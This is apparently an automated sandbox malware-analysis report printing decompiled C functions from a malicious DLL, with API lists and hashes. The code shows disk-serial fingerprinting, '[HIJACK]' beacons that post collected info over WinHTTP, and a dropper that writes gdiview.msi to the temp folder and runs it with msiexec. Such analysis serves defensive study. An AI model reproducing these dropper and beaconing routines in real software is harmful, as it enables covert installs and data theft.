                                                                                                                                                                    				return _v32;
                                                                                                                                                                    			}



























                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3056589307-0
                                                                                                                                                                    • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                                    • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                                    • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                    			E1001D560(void* __edi, char* _a4) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				struct _OVERLAPPED* _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				struct _OVERLAPPED* _v20;
                                                                                                                                                                    				struct _OVERLAPPED* _v24;
                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				short _v548;
                                                                                                                                                                    				char _v1010;
                                                                                                                                                                    				char _v1068;
                                                                                                                                                                    				char _v1070;
                                                                                                                                                                    				intOrPtr _v1084;
                                                                                                                                                                    				intOrPtr _v1092;
                                                                                                                                                                    				intOrPtr _v1096;
                                                                                                                                                                    				intOrPtr _v1100;
                                                                                                                                                                    				intOrPtr _v1104;
                                                                                                                                                                    				void _v1108;
                                                                                                                                                                    				char _v2132;
                                                                                                                                                                    				struct _OVERLAPPED* _v2136;
                                                                                                                                                                    				char _v2137;
                                                                                                                                                                    				long _v2144;
                                                                                                                                                                    				struct _OVERLAPPED* _v2148;
                                                                                                                                                                    				intOrPtr _v2152;
                                                                                                                                                                    				char* _v2156;
                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                    				intOrPtr _t96;
                                                                                                                                                                    				void* _t125;
                                                                                                                                                                    				void* _t126;
                                                                                                                                                                    				void* _t127;
                                                                                                                                                                    
                                                                                                                                                                    				_t125 = __edi;
                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                    				_v2136 = 0;
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				do {
                                                                                                                                                                    					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                                    					_t127 = _t127 + 0xc;
                                                                                                                                                                    					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                                    					if(_v32 != 0xffffffff) {
                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                    						while(1 != 0) {
                                                                                                                                                                    							E1000CF20(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                                    							_t127 = _t127 + 0xc;
                                                                                                                                                                    							_v1104 = 0x49534353;
                                                                                                                                                                    							_v1100 = 0x4b534944;
                                                                                                                                                                    							_v1068 = _v12;
                                                                                                                                                                    							_v1108 = 0x1c;
                                                                                                                                                                    							_v1096 = 0x2710;
                                                                                                                                                                    							_v1084 = 0x211;
                                                                                                                                                                    							_v1092 = 0x1b0501;
                                                                                                                                                                    							_v1070 = 0xec;
                                                                                                                                                                    							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
                                                                                                                                                                    								L20:
                                                                                                                                                                    								if(_v2136 != 0) {
                                                                                                                                                                    									L23:
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_v12 =  &(_v12->Internal);
                                                                                                                                                                    									if(_v12 < 2) {
                                                                                                                                                                    										goto L23;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										continue;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                    								do {
                                                                                                                                                                    									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                                    									_v16 = _v16 + 1;
                                                                                                                                                                    								} while (_v16 < 0x100);
                                                                                                                                                                    								_t91 = E1001CD70( &_v2132);
                                                                                                                                                                    								_t127 = _t127 + 4;
                                                                                                                                                                    								_v28 = _t91;
                                                                                                                                                                    								_v2148 = 0;
                                                                                                                                                                    								_v8 = 0x104;
                                                                                                                                                                    								_v2156 = _a4;
                                                                                                                                                                    								_v2152 = _v28 - _a4;
                                                                                                                                                                    								while(_v8 != 0x80000106) {
                                                                                                                                                                    									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                                    									if(_v2137 != 0) {
                                                                                                                                                                    										 *_v2156 = _v2137;
                                                                                                                                                                    										_v2156 = _v2156 + 1;
                                                                                                                                                                    										_t96 = _v8 - 1;
                                                                                                                                                                    										_v8 = _t96;
                                                                                                                                                                    										if(_t96 != 0) {
                                                                                                                                                                    											continue;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											L17:
                                                                                                                                                                    											_v2156 = _v2156 - 1;
                                                                                                                                                                    											_v2148 = 0x8007007a;
                                                                                                                                                                    										}
                                                                                                                                                                    									} else {
                                                                                                                                                                    										break;
                                                                                                                                                                    									}
                                                                                                                                                                    									L18:
                                                                                                                                                                    									 *_v2156 = 0;
                                                                                                                                                                    									if(_v2148 < 0) {
                                                                                                                                                                    										goto L20;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										goto L24;
                                                                                                                                                                    									}
                                                                                                                                                                    									goto L25;
                                                                                                                                                                    								}
                                                                                                                                                                    								if(_v8 == 0) {
                                                                                                                                                                    									goto L17;
                                                                                                                                                                    								} else {
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L18;
                                                                                                                                                                    							}
                                                                                                                                                                    							L25:
                                                                                                                                                                    							CloseHandle(_v32);
                                                                                                                                                                    							_v20 = _v24;
                                                                                                                                                                    							goto L26;
                                                                                                                                                                    						}
                                                                                                                                                                    						L24:
                                                                                                                                                                    						_v2136 = 1;
                                                                                                                                                                    						goto L25;
                                                                                                                                                                    					}
                                                                                                                                                                    					L26:
                                                                                                                                                                    					_v20 =  &(_v20->Internal);
                                                                                                                                                                    					_v24 = _v20;
                                                                                                                                                                    				} while (_v20 < 0x10);
                                                                                                                                                                    				return _v2136;
                                                                                                                                                                    			}

































                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                                    • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 1001D660
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001D7A2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                                    • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                    • API String ID: 3873020565-153650326
                                                                                                                                                                    • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                    • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                                    • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                    			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				char _v72;
                                                                                                                                                                    				char _v100;
                                                                                                                                                                    				char _v128;
                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                    				char _v160;
                                                                                                                                                                    				char _v188;
                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                    				intOrPtr _v196;
                                                                                                                                                                    				intOrPtr _v200;
                                                                                                                                                                    				intOrPtr _v204;
                                                                                                                                                                    				intOrPtr _v208;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				void* _t76;
                                                                                                                                                                    				intOrPtr _t119;
                                                                                                                                                                    				void* _t127;
                                                                                                                                                                    
                                                                                                                                                                    				_t127 = __eflags;
                                                                                                                                                                    				_t118 = __esi;
                                                                                                                                                                    				_t117 = __edi;
                                                                                                                                                                    				_t87 = __ebx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022C17);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t119;
                                                                                                                                                                    				_v192 = 0;
                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                    				_push(0x30);
                                                                                                                                                                    				_push("post_info");
                                                                                                                                                                    				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                                    				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
                                                                                                                                                                    				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v196 = E10001160( &_v160, _t127, _a8);
                                                                                                                                                                    				_v200 = _v196;
                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                    				E10001A70( &_v128, _v200);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E100011A0( &_v160);
                                                                                                                                                                    				E10001160( &_v100, _t127, "info=");
                                                                                                                                                                    				_v8 = 2;
                                                                                                                                                                    				_v204 = E10001160( &_v188, _t127, _v132);
                                                                                                                                                                    				_v208 = _v204;
                                                                                                                                                                    				_v8 = 3;
                                                                                                                                                                    				E10001A70( &_v100, _v208);
                                                                                                                                                                    				_v8 = 2;
                                                                                                                                                                    				E100011A0( &_v188);
                                                                                                                                                                    				_push(E100011E0( &_v128));
                                                                                                                                                                    				_push(0x3d);
                                                                                                                                                                    				_push("post_info");
                                                                                                                                                                    				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                                    				E10001160( &_v44, _t127, 0x10024ca2);
                                                                                                                                                                    				_v8 = 4;
                                                                                                                                                                    				E10001160( &_v72, _t127, 0x10024ca3);
                                                                                                                                                                    				_v8 = 5;
                                                                                                                                                                    				_t75 = E10001200( &_v100);
                                                                                                                                                                    				_t76 = E100011E0( &_v100);
                                                                                                                                                                    				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
                                                                                                                                                                    				_push(_v132);
                                                                                                                                                                    				E1000CA30(_t87, _t117, _t118, _t127);
                                                                                                                                                                    				E10001110(_a4, _t127,  &_v72);
                                                                                                                                                                    				_v192 = _v192 | 0x00000001;
                                                                                                                                                                    				_v8 = 4;
                                                                                                                                                                    				E100011A0( &_v72);
                                                                                                                                                                    				_v8 = 2;
                                                                                                                                                                    				E100011A0( &_v44);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E100011A0( &_v100);
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				E100011A0( &_v128);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                                      • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                                      • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                                      • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                                      • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                                      • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                                      • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                                      • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                                      • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                                      • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                                      • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                                      • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                                    • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                    • API String ID: 728604215-152146038
                                                                                                                                                                    • Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                                    • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                                    • Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                                    • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				char _v164;
                                                                                                                                                                    				intOrPtr _v168;
                                                                                                                                                                    				intOrPtr _v172;
                                                                                                                                                                    				intOrPtr _v176;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t36;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				void* _t80;
                                                                                                                                                                    				void* _t81;
                                                                                                                                                                    
                                                                                                                                                                    				_t74 = __esi;
                                                                                                                                                                    				_t73 = __edi;
                                                                                                                                                                    				_t57 = __ebx;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                                    				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                                    				E1000CF20(__edi, _v168, 0, 0x21);
                                                                                                                                                                    				E1000CF20(_t73, _v176, 0, 0x10);
                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                    				_t36 = E1000CAC0(_a4);
                                                                                                                                                                    				_t80 = _t75 + 0x24;
                                                                                                                                                                    				if(_t36 <= 0) {
                                                                                                                                                                    					E1000E280(_v168, "00000000000000000000000000000000");
                                                                                                                                                                    					_t81 = _t80 + 8;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					E1001BC10( &_v164);
                                                                                                                                                                    					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
                                                                                                                                                                    					_t67 =  &_v164;
                                                                                                                                                                    					E1001CBC0( &_v164, _v176);
                                                                                                                                                                    					_t81 = _t80 + 0x1c;
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					while(_v8 < 0x10) {
                                                                                                                                                                    						_t67 = _v168 + _v8 * 2;
                                                                                                                                                                    						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
                                                                                                                                                                    						_t81 = _t81 + 0xc;
                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(_v176);
                                                                                                                                                                    				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                                    				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
                                                                                                                                                                    				E1000CF20(_t73, _v172, 0, 0x11);
                                                                                                                                                                    				__eflags = _v168 + 8;
                                                                                                                                                                    				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
                                                                                                                                                                    				_push(_v168);
                                                                                                                                                                    				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                                    				return _v172;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                                    • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                                    • API String ID: 796335831-606320477
                                                                                                                                                                    • Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                                    • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                                    • Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001FC70(void* __edi, void* __eflags) {
                                                                                                                                                                    				char _v1027;
                                                                                                                                                                    				char _v1028;
                                                                                                                                                                    				char _v1291;
                                                                                                                                                                    				char _v1292;
                                                                                                                                                                    				int _t21;
                                                                                                                                                                    
                                                                                                                                                                    				_t29 = __edi;
                                                                                                                                                                    				_v1292 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v1291, 0, 0x103);
                                                                                                                                                                    				_v1028 = 0;
                                                                                                                                                                    				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
                                                                                                                                                                    				GetTempPathA(0x104,  &_v1292);
                                                                                                                                                                    				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
                                                                                                                                                                    				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
                                                                                                                                                                    				E1001FC10( &_v1292, 0x10026888, 0x39e00);
                                                                                                                                                                    				_t21 = PathFileExistsA( &_v1292);
                                                                                                                                                                    				_t38 = _t21;
                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                    					return E1001A1D0(_t38,  &_v1028);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t21;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                                    • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                                      • Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                                      • Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                                      • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                                    • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                    • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                    • API String ID: 1459467440-729886463
                                                                                                                                                                    • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                    • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                                    • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                    • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                    			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    				void* _t47;
                                                                                                                                                                    				void* _t49;
                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                    
                                                                                                                                                                    				_t62 = __eflags;
                                                                                                                                                                    				_t45 = __esi;
                                                                                                                                                                    				_t44 = __edi;
                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                    				E1001FDB0();
                                                                                                                                                                    				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
                                                                                                                                                                    				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                                    				_t37 = _t51;
                                                                                                                                                                    				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                                    				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                                    				E10020180(__ebx, __edi, __esi, _t62);
                                                                                                                                                                    				_t52 = _t51 + 0x1c;
                                                                                                                                                                    				if(PathFileExistsA("C:\\hijack") != 0) {
                                                                                                                                                                    					L7:
                                                                                                                                                                    					_t53 = _t52 - 0x1c;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                                    					E10020180(_t36, _t44, _t45, __eflags);
                                                                                                                                                                    					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
                                                                                                                                                                    					E1001FEA0(_t36, _t44, _t45, __eflags);
                                                                                                                                                                    					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
                                                                                                                                                                    					E1001FDC0(_t36, _t44, _t45, __eflags);
                                                                                                                                                                    					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                                    					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                                    					E10020180(_t36, _t44, _t45, __eflags);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					E1001A0A0();
                                                                                                                                                                    					if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
                                                                                                                                                                    						_t52 = _t52 + 8;
                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							goto L7;
                                                                                                                                                                    						} else {
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				E1001A260();
                                                                                                                                                                    				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                                    				E100011A0(_t47 - 0x28);
                                                                                                                                                                    				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                                    				return _t31;
                                                                                                                                                                    			}













                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692
